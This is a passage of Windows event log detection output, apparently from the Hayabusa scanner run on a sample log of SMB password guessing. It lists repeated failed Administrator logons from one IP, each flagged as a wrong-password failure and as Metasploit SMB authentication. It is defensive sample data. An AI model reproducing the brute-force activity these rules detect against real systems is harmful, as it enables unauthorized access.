Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 